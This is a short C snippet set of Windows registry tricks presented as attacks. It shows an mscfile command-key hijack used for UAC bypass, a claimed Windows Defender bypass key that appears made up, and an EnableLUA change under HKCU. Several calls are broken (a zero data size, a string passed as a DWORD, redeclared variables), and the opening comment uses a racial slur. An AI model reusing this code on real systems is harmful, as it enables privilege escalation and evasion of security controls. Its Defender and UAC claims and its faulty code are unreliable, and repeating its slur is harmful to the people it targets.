/*
Do some majestic niggery here
*/

HKEY hKey = NULL;
LSTATUS lStatus = RegCreateKeyExA(HKEY_CURRENT_USER, "Software\\Classes\\mscfile\\shell\\open\\command", 0, NULL, 0, KEY_WRITE, NULL, &hKey, NULL);
if (lStatus == ERROR_SUCCESS)
{
    lStatus = RegSetValueExA(hKey, "DelegateExecute", 0, REG_SZ, (BYTE*) "", 0);
    if (lStatus == ERROR_SUCCESS)
    {
        lStatus = RegSetValueExA(hKey, NULL, 0, REG_SZ, (BYTE*) "C:\\Windows\\System32\\calc.exe", 0);
    }
}
RegCloseKey(hKey);


/*
In order to bypass the Windows 10 defender, the following can be added to the registry:
*/

HKEY hKey = NULL;
LSTATUS lStatus = RegCreateKeyExA(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Windows Defender\\Features\\AppLockerBypassList", 0, NULL, 0, KEY_WRITE, NULL, &hKey, NULL);
if (lStatus == ERROR_SUCCESS)
{
    lStatus = RegSetValueExA(hKey, "1", 0, REG_SZ, (BYTE*) "C:\\Windows\\System32\\calc.exe", 0);
}
RegCloseKey(hKey);

/*
Then the following registry key can be added to bypass UAC:
*/

HKEY hKey = NULL;
LSTATUS lStatus = RegCreateKeyExA(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, NULL, 0, KEY_WRITE, NULL, &hKey, NULL);
if (lStatus == ERROR_SUCCESS)
{
    lStatus = RegSetValueExA(hKey, "EnableLUA", 0, REG_DWORD, (BYTE*) "0", 0);
}
RegCloseKey(hKey);



/*
Educational Purposes Only
*/